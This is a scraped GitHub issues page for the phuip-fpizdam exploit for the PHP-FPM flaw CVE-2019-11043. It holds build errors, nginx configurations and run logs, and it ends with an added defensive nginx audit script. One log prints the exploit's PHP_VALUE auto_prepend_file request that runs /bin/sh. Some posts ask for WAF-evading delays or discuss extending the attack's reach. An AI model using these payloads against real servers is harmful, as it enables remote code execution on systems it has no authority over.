neex / phuip-fpizdam Goto Github PK
Exploit for CVE-2019-11043
License: MIT License
phuip-fpizdam/requester.go
cl: &http.Client{
    Transport: &http.Transport{
        DisableCompression: true,      // No "Accept-Encoding"
        TLSNextProto:       nextProto, // No http2
        Proxy:              http.ProxyFromEnvironment,
        TLSClientConfig:    &tls.Config{InsecureSkipVerify: true},
    },
    Timeout:       30 * time.Second,
    CheckRedirect: disableRedirects, // No redirects
},
Maybe you can add TLSClientConfig: &tls.Config{InsecureSkipVerify: true}.
Otherwise this error appears: x509: cannot validate certificate for x.x.x.x because it doesn't contain any IP SANs
go run main.go
.\main.go:22:19: undefined: AttackParams
.\main.go:31:13: undefined: Methods
.\main.go:36:22: undefined: NewRequester
.\main.go:51:15: undefined: SetSetting
.\main.go:70:15: undefined: KillWorkers
.\main.go:84:19: undefined: Detect
.\main.go:86:16: undefined: errPisosBruteForbidden
.\main.go:105:14: undefined: Attack
go version go1.6.2 linux/amd64
Ubuntu 16.04.5 LTS
$ go get github.com/neex/phuip-fpizdam
go/src/github.com/neex/phuip-fpizdam/requester.go:30: undefined: http.ErrUseLastResponse
It seems that SCRIPT_FILENAME also has to be filled from the split info. If SCRIPT_FILENAME points to a fixed file, the exploit does not work.
E.g.:
fastcgi_param SCRIPT_FILENAME $document_root/script.php
This is used, for example, in FaaS installs. Also, the reproducer is not reliable at building a vulnerable container; it would be better to point to a vulnerable tag.
If fastcgi_param PATH_INFO $fastcgi_path_info; is set before fastcgi_param REQUEST_URI $request_uri; the exploit no longer finds qsl candidates.
To test it, just comment out the line fastcgi_param REQUEST_URI $request_uri; in /etc/nginx/fastcgi_params and add it after PATH_INFO in /etc/nginx/sites-enabled/default:
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
fastcgi_param REQUEST_URI $request_uri;
PHP 7.0.10 (cli) (built: Jun 25 2019 16:55:30) ( NTS )
nginx version: nginx/1.16.0
server {
    listen 8080;
    root /var/www/test;
    location ~ [^/].php(/|$) {
        fastcgi_split_path_info ^(.+?.php)(/.*)$;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
    }
}
But when I run ./phuip-fpizdam "http://127.0.0.1:8080/index.php", the result is:
2019/10/29 14:59:44 Base status code is 200
2019/10/29 14:59:44 Detect() returned error: no qsl candidates found, invulnerable or something wrong
go install github.com/neex/phuip-fpizdam
# github.com/neex/phuip-fpizdam
/home/golang/src/github.com/neex/phuip-fpizdam/main.go:47:23: constant 4294967296 overflows int
go version go1.13.3 linux/amd64
How to run your sh*t?
I can't check any PHP file. The base status code is always 404.
Waste of my time.
The flag will redirect the messages from the default stdin/out to logfile. This would give you the flexibility to review all messages at a later time. (use case example: large scan at night).
I have this implemented in my fork you can use as the quick reference. Just my 2 cents. Thank you.
https://github.com/yangsec888/phuip-fpizdam/blob/master/main.go
Using the following command
$: go get github.com/neex/phuip-fpizdam
I get the following error
go/src/github.com/neex/phuip-fpizdam/requester.go:31: undefined: http.ErrUseLastResponse
After the attack params were found, the exploit freezes and aborts if the connection is interrupted.
2019/10/25 11:02:48 Using attack params --qsl 1740 --pisos 7 --skip-detect
2019/10/25 11:02:48 Performing attack using php.ini settings...
2019/10/26 10:24:16 Attack returned error: Get https://server.tld/index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;?a=/bin/sh+-c+'which+which'&QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
Inquiring Romanian speakers want to know...
When I run the exploit, fpm shows
error: Passing INI directive through FastCGI: unable to set 'session.auto_start'
What's wrong with that?
Hi,
I've been trying to use your PoC against an Nginx vhost that contains this snippet:
location ^~ /foobar {
    alias /var/www/foobar;
    location ~ ^(?<prefix>/foobar)(?<phpfile>.+?\.php)(?<pathinfo>/.*)?$ {
        fastcgi_split_path_info ^(.+?\.php)(/.+)$;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        include /etc/nginx/fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$phpfile;
        fastcgi_param PATH_INFO $pathinfo if_not_empty;
    }
}
I can't seem to reproduce it hitting http://example.com/foobar/index.php or http://example.com/foobar/module.php/modules/index.php (there are PHP files in both these locations). All my attempts yield an Nginx 404. There is no try_files within this location block.
Would you agree that the above is somehow not exploitable? I am not sure why, wondering if it's because of the use of the $pathinfo if_not_empty instead of $fastcgi_path_info, or perhaps it's the location regex?
P.S. the /etc/nginx/fastcgi_params that gets included looks like this. Note there is a PATH_INFO in there too but I think it gets overwritten by the subsequent fastcgi_param PATH_INFO $pathinfo if_not_empty in the location block?
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;
fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;
fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;
fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;
fastcgi_param HTTPS $https if_not_empty;
fastcgi_param HTTP_PROXY "";
fastcgi_param PATH_INFO $fastcgi_path_info;
# PHP only, required if PHP was built with --enable-force-cgi-redirect
fastcgi_param REDIRECT_STATUS 200;
Thanks!
I'm testing this exploit on one of my websites and I am getting those errors.
Can someone explain what those are? Or is this website vulnerable to this attack?
TEST 1
Test site Url 1 https://www.mysite.com/watch_video.php?key=qwsr7d62679z185r0
2019/10/29 16:30:06 Detect() returned error: error while doing first request: Get https://www.mysite.com/watch_video.php/path%0Ainfo.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: EOF
TEST 2
Test site Url 2 https://www.mysite.com/watch_video.php (without key param)
2019/10/29 16:29:41 Base status code is 200 2019/10/29 16:29:43 Detect() returned error: error for &main.AttackParams{QueryStringLength:1580, PisosLength:1}: Get https://www.mysite.com/watch_video.php/PHP%0Ais_the_shittiest_lang.php?QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ: EOF
.\phuip-fpizdam.exe http://api-local.test.com/index.php
2019/10/24 15:55:51 Base status code is 200
2019/10/24 15:55:52 Detect() returned error: no qsl candidates found, invulnerable or something wrong
Hi!
Thanks for this useful work.
I built a docker image to easily check URLs for vulnerability:
If you consider it useful, feel free to add it to your documentation.
Thanks.
Adding an option to configure a delay for the HTTP requests so it can evade rate limits or certain WAFs.
When executing go install github.com/neex/phuip-fpizdam
, the following error is printed:
$ go install github.com/neex/phuip-fpizdam
can't load package: package github.com/neex/phuip-fpizdam: cannot find package "github.com/neex/phuip-fpizdam" in any of:
/usr/lib/go/src/github.com/neex/phuip-fpizdam (from $GOROOT)
/home/invidian/go/src/github.com/neex/phuip-fpizdam (from $GOPATH)
$ go version
go version go1.13.3 linux/amd64
Just a technical question, our servers are updated :)
We use a split environment where nginx runs in one container and php-fpm in another. I tried to reproduce the issue with your exploit, but it seems to hang at
2019/11/05 21:30:58 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
while the project runs locally (8 mins now). As I inspect your Dockerfile, you seem to have your environment combined in the same container. If the split we did protected us from the attack anyway, this would be nice side-info :)
Also, if this is really the case, it might be an idea to add it to the requirements?
Thanks for developing this poc!
The fastcgi_split_path_info directive must be there ...
It doesn't need to be there, as if it's not there and fastcgi_param PATH_INFO is set to an empty string, the same condition is met.
Currently, our exploit works only when Nginx config is like this:
location ~ [^/]\.php(/|$) {
    ...
}
I believe that far more popular config snippet is like this:
location ~ \.php$ {
    ...
}
which allows only URLs that end with .php (and not just contain .php/ somewhere).
Given location ~ \.php$, there're two further config options:
try_files $uri =404 into the location section. There's nothing we can do in this case as it forbids access to non-existing files (and we need it). However, this requires php-fpm and Nginx to share their FS, and I believe many DevOps consider this not modern enough.
.php. We can win in this case as fastcgi_split_path_info is still probably here (and it doesn't matter which regexp it uses).
However, to improve our exploit for case 2, we need even shorter php.ini options. We have 23 bytes currently and after adding ;.php to every string we have only 18 left. So there's a research field.
Hi,
Thank you for sharing the vulnerability! I have a quick yes-or-no question.
It includes something like try_files $uri =404 into the location section. There's nothing we can do in this case as it forbids access to non-existing files (and we need it). source
No file existence checks like try_files $uri =404 or if (-f $uri). If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch. source
My config, copied from the default Ubuntu one, contains these lines:
# regex to split $uri to $fastcgi_script_name and $fastcgi_path
fastcgi_split_path_info ^(.+\.php)(/.+)$;
# Check that the PHP script exists before passing it
try_files $fastcgi_script_name =404;
# Bypass the fact that try_files resets $fastcgi_path_info
# see: http://trac.nginx.org/nginx/ticket/321
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
So right after it performs the try_files check, it restores the PATH_INFO - does that make it vulnerable again?
Is this good or bad?
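The two conditions the issue text above spells out (PATH_INFO handed to php-fpm via fastcgi_split_path_info, or set even to an empty string, and no try_files / if (-f ...) check in the location block) can be checked mechanically. The following audit script is an added example, not code from the phuip-fpizdam project or from any post on this page; the sample nginx configs are constructed, and include directives are reported but not resolved.

```python
import re

# Constructed sample configs (not taken from the page): the common PHP handler
# block that hands PATH_INFO to php-fpm with no file-existence check, and the
# same block with the try_files check the issue text names as the easiest fix.
RISKY_CONF = r"""
location ~ [^/]\.php(/|$) {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass 127.0.0.1:9000;
}
"""
HARDENED_CONF = RISKY_CONF.replace(
    "include fastcgi_params;", "try_files $uri =404;\n    include fastcgi_params;")

# One location block: optional modifier, pattern, then a body with no nested block.
LOCATION_RE = re.compile(r"location\s+(?:[~^=*]+\s+)?(\S+)\s*\{([^{}]*)\}", re.S)
PATH_INFO_RE = re.compile(r"fastcgi_param\s+PATH_INFO\b")   # any value, "" included
FILE_CHECK_RE = re.compile(r"\btry_files\b|if\s*\(\s*-f\s")

def audit(conf):
    """Return one finding per PHP handler block that forwards PATH_INFO to
    php-fpm and has no try_files / if (-f ...) check in the same block."""
    findings = []
    for m in LOCATION_RE.finditer(conf):
        pattern, body = m.group(1), m.group(2)
        if "fastcgi_pass" not in body or ".php" not in pattern:
            continue  # not a PHP handler block
        if not (PATH_INFO_RE.search(body) or "fastcgi_split_path_info" in body):
            continue  # this block never passes PATH_INFO to php-fpm
        if FILE_CHECK_RE.search(body):
            continue  # non-existent scripts are rejected before FastCGI forwarding
        findings.append({
            "location": pattern,
            "note": "PATH_INFO forwarded without a file-existence check; "
                    "add 'try_files $uri =404;' to the block",
            # Included files are not parsed here: a PATH_INFO set inside
            # fastcgi_params (as in some distro configs) would not be seen.
            "unresolved_includes": re.findall(r"include\s+(\S+);", body),
        })
    return findings

if __name__ == "__main__":
    for name, conf in (("risky", RISKY_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf))
```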
Base status code is 404
Detect() returned error: no qsl candidates found, invulnerable or something wrong